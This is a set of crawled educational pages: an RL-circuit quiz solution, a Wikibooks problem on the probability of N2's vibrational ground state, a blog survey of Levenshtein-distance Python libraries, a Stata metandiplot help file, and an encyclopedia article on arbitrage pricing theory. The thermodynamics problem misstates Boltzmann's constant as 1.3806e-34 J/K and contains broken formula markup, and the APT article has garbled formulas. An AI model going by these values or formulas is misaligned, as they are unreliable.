[ "Post Go back to editing\n\n# May StudentZone Quiz Solution\n\nQuestion 1:\n\nInclude plots of IL and VR for different tp values: 2τ ,5τ, 10τ.\n\nBefore including the plots we need to compute the proper frequency of the input signal.\n\nTherefore, considering the input values L = 20mH and R = 200Ω we compute the time constant τ.\n\nNote that tp represent only half of the input signal period. In order to obtain the frequency of the square wave we use the following equation:", null, "Using the computed frequency for the input signal, we obtain the following plot corresponding to tp = 2τ.", null, "Figure 1. Plot example for tp = 2τ\n\nUsing the same procedure we compute the frequency for:\n\ntp = 5τ", null, "Figure 2. Plot example for tp = 5τ\n\ntp=10τ", null, "Figure 3. Plot example for tp = 10τ\n\nQuestion 2:\n\nA Capacitor stores energy. What do you think an Inductor stores? Answer in brief." ]
[ null, "https://ez.analog.com/cfs-filesystemfile/__key/communityserver-components-secureimagefileviewer/communityserver-discussions-components-files-125/c823598cfd68c1f43686cb776cca1251.png_2D00_216x46.png", null, "https://ez.analog.com/cfs-filesystemfile/__key/communityserver-components-secureimagefileviewer/communityserver-discussions-components-files-125/8a39c3617216ad9ad16552d08178711c.png_2D00_624x413.png", null, "https://ez.analog.com/cfs-filesystemfile/__key/communityserver-components-secureimagefileviewer/communityserver-discussions-components-files-125/aa2d39dfa09fef88220a64410e45d36a.png_2D00_624x415.png", null, "https://ez.analog.com/cfs-filesystemfile/__key/communityserver-components-secureimagefileviewer/communityserver-discussions-components-files-125/3b3370df92aafc076228b73b35240eb4.png_2D00_624x414.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.80431926,"math_prob":0.98859954,"size":1053,"snap":"2022-40-2023-06","text_gpt3_token_len":256,"char_repetition_ratio":0.11916111,"word_repetition_ratio":0.016216217,"special_character_ratio":0.23076923,"punctuation_ratio":0.120192304,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99940205,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-09T02:57:36Z\",\"WARC-Record-ID\":\"<urn:uuid:c0a7d40f-d1c9-4b1e-bd73-e985d0f5d2cc>\",\"Content-Length\":\"175725\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7a10d9cf-9d6f-4094-afc1-1854ae918fa0>\",\"WARC-Concurrent-To\":\"<urn:uuid:d36257f2-49e3-4646-91cf-5d968d907272>\",\"WARC-IP-Address\":\"23.52.146.177\",\"WARC-Target-URI\":\"https://ez.analog.com/studentzone/f/discussions/76437/may-studentzone-quiz-solution\",\"WARC-Payload-Digest\":\"sha1:QUXEVGM5IFTIR6UK6JYTLQUWJKF77A2I\",\"WARC-Block-Digest\":\"sha1:H6QSQY4TD7RM4JNO6BA5YLKLVTOZALGQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764501066.53_warc_CC-MAIN-20230209014102-20230209044102-00581.warc.gz\"}"}
https://en.wikibooks.org/wiki/Statistical_Thermodynamics_and_Rate_Theories/Sample_problems
[ "Statistical Thermodynamics and Rate Theories/Sample problems\n\nProblem 1\n\nCalculate the probability of a molecule of N2 being in the ground vibrational state at 298 K.\n\nThe probability that a system occupies a given state at an instant of time and a specific temperature is given by the Boltzmann distribution.\n\n$P_{i}={\\frac {\\exp \\left({\\frac {-E_{i}}{k_{B}T}}\\right)}{\\sum _{j}\\exp \\left({\\frac {-E_{j}}{k_{B}T}}\\right)}}$", null, "$P_{i}={\\frac {\\exp \\left({\\frac {-E_{i}}{k_{B}T}}\\right)}{Q}}$", null, "where:\n\n• i is the energy of the specific state, i, of interest\n• kB is Boltzmann's constant, which equals $1.3806\\times 10^{-34}$", null, "JK-1\n• T is the temperature in Kelvin\n\nThe denominator of this function is known as the partition function, Q, which corresponds to the total number of accessible states of the molecule.\n\nThe closed form of the molecular vibrational partition function is given by:\n\n$q_{vib}={\\frac {1}{1-e^{-h\\nu /k_{B}T}}}$", null, "where:\n\n• $\\nu$", null, "is the fundamental vibrational frequency of N2 in s-1\n• h is Planck's constant, which is $6.62607\\times 10^{-34}$", null, "Js\n\nThis is equivalent to Q since only the vibrational energy states are of interest and there is only one molecule of N2. The equation for determining the partition function Q, from molecular partition functions, q, is given by:\n\n$Q={\\frac {q^{N}}{N!}}$", null, "where:\n\n• N is the number of molecules\n\nThe fundamental vibrational frequency of N2 in wavenumbers, ${\\tilde {\\nu }}$", null, ", is 2358.6cm-1 \n\nThe fundamental vibrational frequency in s-1 is given by:\n\n$\\nu ={\\tilde {\\nu }}\\times c$", null, "where\n\n• c is the speed of light, which is $2.9979\\times 10^{10}$", null, "cm/s\n\nFor N2,\n\n$\\nu$", null, "= (2358.6cm-1) \\times (2.9979 \\times 10^{10| cm/s) = 7.0708 \\times 10^{13}[/itex]\n\nFor N2 at 298 K,\n\n$q_{v}=\\left({\\frac {1}{1-e^{-(6.62607\\times 10^{-34}Js\\times 7.0708\\times 10^{13}s^{-1})/(1.3806\\times 10^{-23}JK^{-1}\\times 298K)}}}\\right)=1.000011333$", null, "The vibrational energy levels follow that of a quantum mechanical harmonic oscillator. The energy levels are represented by:\n\n$E_{n}=h\\nu (n+{\\frac {1}{2}})$", null, "where:\n\n• n is the quantum vibrational number, which equals 0, 1, 2,...\n\nFor the ground state (n=0), the energy becomes:\n\n$E_{0}={\\frac {1}{2}}h\\nu$", null, "Since the vibrational zero point energy is not zero, the energy levels are defined relative to the n=0 level. This is used in the molecular partition function above and therefore, the ground state is regarded as having zero energy.\n\nFor N2 the probability of being in the ground state at 298K is:\n\n$P_{0}={\\frac {e^{-E_{0}/k_{B}T}}{q_{v}}}$", null, "$P_{0}={\\frac {e^{(0J)/(1.3806\\times 10^{-23}\\times 298K)}}{1.000011333}}$", null, "$P_{0}=0.999988667$", null, "This means that at room temperature, the probability of a molecule of N2 being in the ground vibrational state is 99.9988667%." ]
[ null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/f8c0d65d13d8d2b4999f4ff7002085ee4de7442a", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/1d5bfff84f6258ef0302bff29a491c0524c32069", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/4c63b9eb785079d732e1687b6feebcd1e8784ae7", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/d2c63fcf9a3eb5a7ae765aba57147507cf418d08", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c15bbbb971240cf328aba572178f091684585468", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/aa1723e100af3215278e7316324420621e569de7", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c08ea84e5fd66b0446bd7eeb311a990be8c203bc", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/0d6b66a3de6d14b026bff87c519315d260be4c97", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/abcd13e3f1aea64d6a65e8a9476cd356c67aa7a4", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/cf08806cad71cb0fea32e9f93f2dc12b3cda6a1e", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c15bbbb971240cf328aba572178f091684585468", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c3ecd9c7003e2c09e540154cf989cc2a4a17ad1b", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/5b1a6138745b9e69d9edb93dfcb115599265ba44", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/a95c96f5d84eed0c79290b7a5aac64213066e3cc", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/2080623f9cf002e8e77b7b26df571ca69853cab8", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/87f5f9d4e4be9cf42eab38e085b33db0ac544f6a", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/58c6e65c7dc99e5f5d54454f0b96571123efe506", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8405454,"math_prob":0.9998832,"size":7114,"snap":"2019-43-2019-47","text_gpt3_token_len":1916,"char_repetition_ratio":0.17974684,"word_repetition_ratio":0.12430721,"special_character_ratio":0.29195952,"punctuation_ratio":0.1336599,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999943,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34],"im_url_duplicate_count":[null,6,null,3,null,3,null,3,null,null,null,4,null,null,null,null,null,3,null,3,null,null,null,3,null,3,null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-19T15:52:34Z\",\"WARC-Record-ID\":\"<urn:uuid:a05495a9-57a6-44c9-bba5-7d2f1c174e6b>\",\"Content-Length\":\"257263\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bebb32e0-7e4c-4e8a-87e8-a8a6331739fd>\",\"WARC-Concurrent-To\":\"<urn:uuid:86a23e4c-4c9a-41af-aef6-360f7f64b4ef>\",\"WARC-IP-Address\":\"208.80.154.224\",\"WARC-Target-URI\":\"https://en.wikibooks.org/wiki/Statistical_Thermodynamics_and_Rate_Theories/Sample_problems\",\"WARC-Payload-Digest\":\"sha1:DJYJQYU67J6HFLANMASP4A3JKFR34TOM\",\"WARC-Block-Digest\":\"sha1:NWOK7PHP65F4FFYWWOHB5E5O4AP5ZRJL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986696339.42_warc_CC-MAIN-20191019141654-20191019165154-00059.warc.gz\"}"}
https://www.aylakhan.tech/?p=736
[ "Recent Posts\n\nArchives\n\nCategories\n\n• Home>\n• data>\nIf this helped you, please share!\n\n# Python text analysis tools: Levenshtein Distance\n\nPublished January 31, 2020 in data\n\nFiguring out how similar two strings are and then making that similarity a quantitative measurement is a basic problem in text analysis, text mining and natural language processing. There are a number of efficient methods to solve this problem. This survey looks at Python implementations of a simple but widely used method: Levenshtein distance as a measure of edit distance.\n\nEdit distance between two strings is the minimum total number of operations that change one string into the other ,,. Edit distance is zero if two strings are identical. Edit distance is positive if two strings are not identical. Edit distance does not consider the length of the strings being compared: two strings that are close in length and are different by one character are treated the same as two strings where one is much longer than the other . All the implementations I tested are case-sensitive.\n\nGenerally, edit operations are inserting, deleting and substituting characters. Some methods support transposing characters. Fuzzy string matching libraries such as fuzzywuzzy are typically based on edit distance methods.\n\n## Levenshtein Distance\n\nLevenshtein distance computes edit distance with insert, delete and substitution operations. This is the most parsimonious set of operations to transform one string into another. Levenshtein distance can be computed recursively , but efficient implementations use dynamic programming solutions with a table for holding computed costs ,.\n\nHere are some illustrated simple edit distance operations. The first four examples demonstrate the operations on single character and empty strings:", null, "", null, "", null, "", null, "Next, we have a simple sequence of replace operations that transform “ab” to “ba”:", null, "Both of these examples have edit distance equal to 3 because it takes three operations to transform one word to another:", null, "", null, "## Damerau-Levenshtein Distance\n\nDamerau-Levenshtein extends the Levenshtein distance method with an additional operation: transpose, where two adjacent characters can be swapped. Damerau-Levenshtein may compute smaller edit distances if adjacent transpose operations can replace multiple replace operations. Efficient implementations are also based on dynamic programming .\n\nTaking another look at the similarity of “ab” and “ba”, where the Levenshtein edit distance is 2:", null, "Text similarity calculated using Damerau-Levenshtein returns edit distance equal to 1 because “ab” is changed into “ba” with one transpose operation instead of two replace operations:", null, "The edit distance between “irks” and “risk” is larger with Levenshtein distance than Damerau-Levenshtein distance. Another way to think about this is “irks” and “risk” are more similar if using Damerau-Levenshtein than if using Levenshtein.", null, "", null, "## Python Tools\n\nFuzzywuzzy‘s optimized similarity functions are implemented using the python-Levenshtein module. The actual Levenshtein edit distance code is written in C for faster performance. Fuzzywuzzy can fall back to a slower pure Python implementation if python-Levenshtein is not available.\n\nThe pyxDamerauLevenshtein module provides Damerau-Levenshtein as a dynamic programming algorithm written in C.\n\nThe StringDist module provides both Levenshtein and Damerau-Levenshtein. 
The algorithms are also implemented in C and falls back to Python if the C implementation can’t be used.\n\nThe jellyfish module includes an extensive list of string matching algorithms, including both Levenshtein and Damerau-Levenshtein, all implemented in both C and Python with the choice of using either.\n\n### Benchmarks\n\nI used longer strings than in the illustrated examples to benchmark the performance and memory usage of these Python tools. The first test computes the edit distances between “this was a test” and “this is a coast”. The second test is the Amelia Earhart quote “the most difficult thing is the decision to act, the rest is merely tenacity” compared with this version mutated with deliberately misspelled words: “teh most difficult thing is the decsion to act, the reast is merely teancty”. The Levenshtein and Damerau-Levenshtein edit distances are equal in the first test. The Damerau-Levenshtein edit distance is smaller than the Levenshtein edit distance in the second test.\n\nMemory usage is consistent for both examples and all tools (approximately 57-58 MiB). There is a lot more variation in performance between the tools: python-Levenshtein was very fast, StringDist and jellyfish also computed edit distances efficiently and were the fastest Damerau-Levenshtein implementations. StringDist performed slightly better in the first test and jellyfish performed better in the second test.\n\n1. Jurafsky, Daniel and James H. Martin. Speech and Language Processing: An Introduction to Natural Language Processing, Computational Linguistics, and Speech Recognition. 3rd Edition Draft. Accessed August 11, 2019. https://web.stanford.edu/~jurafsky/slp3.\n2. Koutroumbas, Konstantinos and Sergios Theodoridis. Pattern recognition. Cambridge: Academic Press, 2008.\n3. Sarkar, Dipanjan. Text Analytics with Python: A Practitioner’s Guide to Natural Language Processing. New York: Apress Media, 2019.\n4. “Edit Distance”, Wikipedia, last modified August 3, 2019, https://en.wikipedia.org/wiki/Edit_distance.\n5. “Levenshtein Distance”, Wikipedia, last modified August 20, 2019, https://en.wikipedia.org/wiki/Levenshtein_distance.\n6. “Damerau-Levenshtein Distance”, Wikipedia, last modified May 3, 2019, https://en.wikipedia.org/wiki/Damerau-Levenshtein_distance." ]
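To make the two definitions concrete, here are minimal pure-Python dynamic-programming sketches of both distances, written for this note. They are illustrative reference implementations only, not the optimized C code in python-Levenshtein, pyxDamerauLevenshtein, StringDist or jellyfish that the benchmarks above measure.

```python
def levenshtein(a: str, b: str) -> int:
    """Plain Levenshtein distance: insert, delete, substitute."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]


def damerau_levenshtein(a: str, b: str) -> int:
    """Damerau variant (restricted / optimal string alignment form):
    also allows swapping two adjacent characters."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = a[i - 1] != b[j - 1]
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)   # transposition
    return d[-1][-1]


print(levenshtein("ab", "ba"), damerau_levenshtein("ab", "ba"))        # 2 1
print(levenshtein("irks", "risk"), damerau_levenshtein("irks", "risk"))  # 3 2
```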
[ null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/insert1.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/delete1.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/replace1.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/replace2.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/replace3.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/about_around.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/teapot_tepid.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/replace3.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/transpose1.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/irks_risk.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/irks_risk_transpose.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9069708,"math_prob":0.8047548,"size":4568,"snap":"2022-40-2023-06","text_gpt3_token_len":936,"char_repetition_ratio":0.18667835,"word_repetition_ratio":0.0029850747,"special_character_ratio":0.17797723,"punctuation_ratio":0.08068783,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96721673,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22],"im_url_duplicate_count":[null,4,null,4,null,4,null,4,null,8,null,4,null,4,null,8,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-25T19:53:06Z\",\"WARC-Record-ID\":\"<urn:uuid:8e487d1f-6fe0-4c36-8aef-1c5a0dfca1a2>\",\"Content-Length\":\"56914\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:005fc18e-e7b4-4716-88f2-e0d4a2ba348f>\",\"WARC-Concurrent-To\":\"<urn:uuid:9bddf803-8bb1-4f9f-a84d-1878b55663f1>\",\"WARC-IP-Address\":\"35.209.188.49\",\"WARC-Target-URI\":\"https://www.aylakhan.tech/?p=736\",\"WARC-Payload-Digest\":\"sha1:BP2OECPSC5WHDKD2BMOA3HZ2PB7DQKPJ\",\"WARC-Block-Digest\":\"sha1:U7MUVYRVEQO3SLYMNJG7DBGTEMV7ZLMY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030334596.27_warc_CC-MAIN-20220925193816-20220925223816-00375.warc.gz\"}"}
http://fmwww.bc.edu/repec/bocode/m/metandiplot.html
[ "```help metandiplot (Roger Harbord)\nalso see: metandi\n-------------------------------------------------------------------------------\n\nTitle\n\nmetandiplot -- SROC plot of results from metandi\n\nSyntax\n\nmetandiplot [ tp fp fn tn] [if] [in] [weight] [, notruncate level(#)\ntwoway_options ]\n\naweights, fweights, and pweights are allowed; see weight.\n\nDescription\n\nmetandiplot graphs the results from metandi on a summary receiver\noperating characteristic (SROC) plot. By default the display includes:\n\n- a summary point showing the summary sensitivity and specificity\n- a confidence contour outlining the confidence region for the\nsummary point\n- one or more prediction contours outlining the prediction region for\nthe true sensitivity and specificity in a future study\n- the HSROC curve from the hierarchical Summary ROC (HSROC) model\n\nIf the optional variables tp fp fn tn are included on the command line,\nthe plot also includes study estimates indicating the sensitivity and\nspecificity estimated using the data from each study separately.\n\nAny of these features may be customised or turned off using the\nsubplot_options.\n\nOptions\n\nnotruncate specificies that the HSROC curve will not be truncated outside\nthe region of the data. By default, the HSROC curve is not shown\nwhen the sensitivity or specificity is less than its smallest study\nestimate.\n\nlevel(#) specifies the confidence level, in percent, for the confidence\ncontour; see help level.\n\npredlevel(numlist) specifies the levels, in percent, for the prediction\ncontour(s). The default is a single contour at the same probability\nlevel as the confidence region. Up to five prediction contours are\nallowed.\n\nnpoints(#) specifies the number of points to use in drawing the outlines\nof the confidence and prediction regions. The default is 500.\n\nsubplot_options: summopts(), confopts(), predopts(), curveopts() and\nstudyopts() specify options that control the display of the summary\npoint, confidence contour, prediction contour(s), HSROC curve and\nstudy symbols respectively. The options within each set of\nparantheses are simply passed through to the appropriate twoway plot.\nIn addition, any of the plots can be turned off by specifying, for\nexample, summopts(off).\n\nsee addplot_option. For example, empirical Bayes predictions could\nbe generated by using predict after metandi and added to the graph.\nSee metandipostestimation.\n\ntwoway_options are most of the options documented in twoway_options,\nincluding options for titles, axes, labels, schemes and saving the\ngraph to disk. The by() option is not allowed, however.\n\nRemarks\n\nThe default is to weight the study estimates by the total number in each\nstudy, giving symbols (open circles by default) scaled according to the\nsize of the weights; see weighted markers. To make the symbols all the\nsame size, specify constant weights, e.g. [aw=1].\n\nExamples\n\n. metandiplot\n\n. metandiplot tp fp fn tn\n\n. metandiplot tp fp fn tn [aw=1], conf(off) curve(off) predlevel(50 80 95\n99)\n\nAlso see\n\n```" ]
https://db0nus869y26v.cloudfront.net/en/Arbitrage_pricing_theory
[ "In finance, arbitrage pricing theory (APT) is a multi-factor model for asset pricing which relates various macro-economic (systematic) risk variables to the pricing of financial assets. Proposed by economist Stephen Ross in 1976, it is widely believed to be an improved alternative to its predecessor, the Capital Asset Pricing Model (CAPM). APT is founded upon the law of one price, which suggests that within an equilibrium market, rational investors will implement arbitrage such that the equilibrium price is eventually realised. As such, APT argues that when opportunities for arbitrage are exhausted in a given period, then the expected return of an asset is a linear function of various factors or theoretical market indices, where sensitivities of each factor is represented by a factor-specific beta coefficient or factor loading. Consequently, it provides traders with an indication of ‘true’ asset value and enables exploitation of market discrepancies via arbitrage. The linear factor model structure of the APT is used as the basis for evaluating asset allocation, the performance of managed funds as well as the calculation of cost of capital. \n\n## Model\n\nAPT is a single-period static model, which helps investors understand the trade-off between risk and return. The average investor aims to optimise the returns for any given level or risk and as such, expects a positive return for bearing greater risk. As per the APT model, risky asset returns are said to follow a factor intensity structure if they can be expressed as:\n\n$r_{j}=a_{j}+\\beta _{j1}f_{1}+\\beta _{j2}f_{2}+\\cdots +\\beta _{jn}f_{n}+\\epsilon _{j)$", null, "where\n• $a_{j)$", null, "is a constant for asset $j$", null, "• $f_{n)$", null, "is a systematic factor\n• $\\beta _{jn)$", null, "is the sensitivity of the $j$", null, "th asset to factor $n$", null, ", also called factor loading,\n• and $\\epsilon _{j)$", null, "is the risky asset's idiosyncratic random shock with mean zero.\n\nIdiosyncratic shocks are assumed to be uncorrelated across assets and uncorrelated with the factors.\n\nThe APT model states that if asset returns follow a factor structure then the following relation exists between expected returns and the factor sensitivities:\n\n$\\mathbb {E} \\left(r_{j}\\right)=r_{f}+\\beta _{j1}RP_{1}+\\beta _{j2}RP_{2}+\\cdots +\\beta _{jn}RP_{n)$", null, "where\n• $RP_{n)$", null, "is the risk premium of the factor,\n• $r_{f)$", null, "is the risk-free rate,\n\nThat is, the expected return of an asset j is a linear function of the asset's sensitivities to the n factors.\n\nNote that there are some assumptions and requirements that have to be fulfilled for the latter to be correct: There must be perfect competition in the market, and the total number of factors may never surpass the total number of assets (in order to avoid the problem of matrix singularity).\n\n### General Model\n\nFor a set of assets with returns $r\\in \\mathbb {R} ^{m)$", null, ", factor loadings $\\Lambda \\in \\mathbb {R} ^{m\\times n)$", null, ", and factors $f\\in \\mathbb {R} ^{n)$", null, ", a general factor model that is used in APT is:\n\n$r=r_{f}+\\Lambda f+\\epsilon ,\\quad \\epsilon \\sim {\\mathcal {N))(0,\\Psi )$", null, "where $\\epsilon$", null, "follows a multivariate normal distribution. In general, it is useful to assume that the factors are distributed as:\n$f\\sim {\\mathcal {N))(\\mu ,\\Omega )$", null, "where $\\mu$", null, "is the expected risk premium vector and $\\Omega$", null, "is the factor covariance matrix. 
Assuming that the noise terms for the returns and factors are uncorrelated, the mean and covariance for the returns are respectively:\n$\\mathbb {E} (r)=r_{f}+\\Lambda \\mu ,\\quad {\\text{Cov))(r)=\\Lambda \\Omega \\Lambda ^{T}+\\Psi$", null, "It is generally assumed that we know the factors in a model, which allows least squares to be utilized. However, an alternative to this is to assume that the factors are latent variables and employ factor analysis - akin to the form used in psychometrics - to extract them.\n\n### Assumptions of APT Model\n\nThe APT model for asset valuation is founded on the following assumptions:\n\n1. Investors are risk-averse in nature and possess the same expectations\n2. Efficient markets with limited opportunity for arbitrage\n3. Perfect capital markets\n4. Infinite number of assets\n5. Risk factors are indicative of systematic risks that cannot be diversified away and thus impact all financial assets, to some degree. Thus, these factors must be:\n• Non-specific to any individual firm or industry\n• Compensated by the market via a risk premium\n• A random variable\n\n## Arbitrage\n\nArbitrage is the practice whereby investors take advantage of slight variations in asset valuation from its fair price, to generate a profit. It is the realisation of a positive expected return from overvalued or undervalued securities in the inefficient market without any incremental risk and zero additional investments.\n\n### Mechanics\n\nIn the APT context, arbitrage consists of trading in two assets – with at least one being mispriced. The arbitrageur sells the asset which is relatively too expensive and uses the proceeds to buy one which is relatively too cheap.\n\nUnder the APT, an asset is mispriced if its current price diverges from the price predicted by the model. The asset price today should equal the sum of all future cash flows discounted at the APT rate, where the expected return of the asset is a linear function of various factors, and sensitivity to changes in each factor is represented by a factor-specific beta coefficient.\n\nA correctly priced asset here may be in fact a synthetic asset - a portfolio consisting of other correctly priced assets. This portfolio has the same exposure to each of the macroeconomic factors as the mispriced asset. The arbitrageur creates the portfolio by identifying n correctly priced assets (one per risk-factor, plus one) and then weighting the assets such that portfolio beta per factor is the same as for the mispriced asset.\n\nWhen the investor is long the asset and short the portfolio (or vice versa) he has created a position which has a positive expected return (the difference between asset return and portfolio return) and which has a net zero exposure to any macroeconomic factor and is therefore risk free (other than for firm specific risk). The arbitrageur is thus in a position to make a risk-free profit:\n\n Where today's price is too low: The implication is that at the end of the period the portfolio would have appreciated at the rate implied by the APT, whereas the mispriced asset would have appreciated at more than this rate. The arbitrageur could therefore: Today: 1 short sell the portfolio 2 buy the mispriced asset with the proceeds. At the end of the period: 1 sell the mispriced asset 2 use the proceeds to buy back the portfolio 3 pocket the difference. 
Where today's price is too high: The implication is that at the end of the period the portfolio would have appreciated at the rate implied by the APT, whereas the mispriced asset would have appreciated at less than this rate. The arbitrageur could therefore: Today: 1 short sell the mispriced asset 2 buy the portfolio with the proceeds. At the end of the period: 1 sell the portfolio 2 use the proceeds to buy back the mispriced asset 3 pocket the difference.\n\n## Difference between the capital asset pricing model\n\nThe APT along with the capital asset pricing model (CAPM) is one of two influential theories on asset pricing. The APT differs from the CAPM in that it is less restrictive in its assumptions, making it more flexible for use in a wider range of application. Thus, it possesses greator explanatory power (as opposed to statistical) for expected asset returns. It assumes that each investor will hold a unique portfolio with its own particular array of betas, as opposed to the identical \"market portfolio\". In some ways, the CAPM can be considered a \"special case\" of the APT in that the securities market line represents a single-factor model of the asset price, where beta is exposed to changes in value of the market.\n\nFundamentally, the CAPM is derived on the premise that all factors in the economy can be reconciled into one factor represented by a market portfolio, thus implying they all have equivalent weight on the asset’s return. In contrast, the APT model suggests that each stock reacts uniquely to various macroeconomic factors and thus the impact of each must be accounted for separately.\n\nA disadvantage of APT is that the selection and the number of factors to use in the model is ambiguous. Most academics use three to five factors to model returns, but the factors selected have not been empirically robust. In many instances the CAPM, as a model to estimate expected returns, has empirically outperformed the more advanced APT.\n\nAdditionally, the APT can be seen as a \"supply-side\" model, since its beta coefficients reflect the sensitivity of the underlying asset to economic factors. Thus, factor shocks would cause structural changes in assets' expected returns, or in the case of stocks, in firms' profitabilities.\n\nOn the other side, the capital asset pricing model is considered a \"demand side\" model. Its results, although similar to those of the APT, arise from a maximization problem of each investor's utility function, and from the resulting market equilibrium (investors are considered to be the \"consumers\" of the assets).\n\n## Implementation\n\nAs with the CAPM, the factor-specific betas are found via a linear regression of historical security returns on the factor in question. Unlike the CAPM, the APT, however, does not itself reveal the identity of its priced factors - the number and nature of these factors is likely to change over time and between economies. As a result, this issue is essentially empirical in nature. Several a priori guidelines as to the characteristics required of potential factors are, however, suggested:\n\n1. their impact on asset prices manifests in their unexpected movements and they are completely unpredictable to the market at the beginning of each period \n2. they should represent undiversifiable influences (these are, clearly, more likely to be macroeconomic rather than firm-specific in nature) on expected returns and so must be quantifiable with non-zero prices \n3. timely and accurate information on these variables is required\n4. 
the relationship should be theoretically justifiable on economic grounds\n\nChen, Roll and Ross identified the following macro-economic factors as significant in explaining security returns:\n\n• surprises in inflation;\n• surprises in GNP as indicated by an industrial production index;\n• surprises in investor confidence due to changes in default premium in corporate bonds;\n• surprise shifts in the yield curve.\n\nAs a practical matter, indices or spot or futures market prices may be used in place of macro-economic factors, which are reported at low frequency (e.g. monthly) and often with significant estimation errors. Market indices are sometimes derived by means of factor analysis. More direct \"indices\" that might be used are:\n\n• short-term interest rates;\n• the difference in long-term and short-term interest rates;\n• a diversified stock index such as the S&P 500 or NYSE Composite;\n• oil prices\n• gold or other precious metal prices\n• Currency exchange rates\n\n3. ^ Huberman, G. & Wang, Z. (2005). \"Arbitrage Pricing Theory\" (PDF).((cite web)): CS1 maint: multiple names: authors list (link)" ]
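To make the pricing relation concrete, here is a small numerical illustration of the APT equation E(r_j) = r_f + Σ β_jk · RP_k. The risk-free rate, factor loadings and risk premia below are made-up numbers chosen only for the example; they do not come from Chen, Roll and Ross or any other cited source.

```python
import numpy as np

r_f = 0.03                              # assumed risk-free rate
risk_premia = np.array([0.05, 0.02])    # hypothetical RP_1, RP_2
betas = np.array([
    [1.2, 0.4],    # factor loadings of asset 1
    [0.8, 1.1],    # factor loadings of asset 2
])

# Expected return of each asset: r_f plus the beta-weighted risk premia.
expected_returns = r_f + betas @ risk_premia
print(expected_returns)   # [0.098 0.092]
```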
